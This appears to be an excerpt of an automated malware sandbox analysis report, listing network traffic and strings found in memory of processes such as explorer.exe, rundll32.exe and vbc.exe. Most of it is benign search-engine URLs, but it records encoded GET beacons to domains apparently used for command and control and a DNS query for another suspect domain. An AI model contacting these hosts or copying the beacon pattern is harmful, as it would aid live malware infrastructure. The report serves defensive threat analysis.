          Source: global trafficHTTP traffic detected: GET /o56q/?mL0=Lg4DNBfwCTdoZLnXKvmswQE2HeXzej7VDwiGjOCQv6fEN8TXR+UTrTnc2v5FsvAKWI4bvw==&sFNp=jpX0Lfi0J HTTP/1.1Host: www.the-trinity-project.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=9OrW47TrMTZH15Vmzbe9TQM6sSr1xjl4p0LLri3wKcTyHbeStzlrAaSeWLbT0hv9vCeuEg== HTTP/1.1Host: www.crimson.schoolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.nanox.ltd
          Source: explorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2145875175.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2145136423.0000000003E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347696044.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2145136423.0000000003E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347696044.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, 00000004.00000003.2138537315.0000000004CC0000.00000004.00000001.sdmpString found in binary or memory: http://ns.a
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: RegAsm.exe, 00000005.00000002.2170170387.0000000000BD0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2140356233.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2148500567.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2145136423.0000000003E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347696044.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2145875175.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2145136423.0000000003E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347696044.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: RegAsm.exe, 00000005.00000002.2170170387.0000000000BD0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2140356233.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
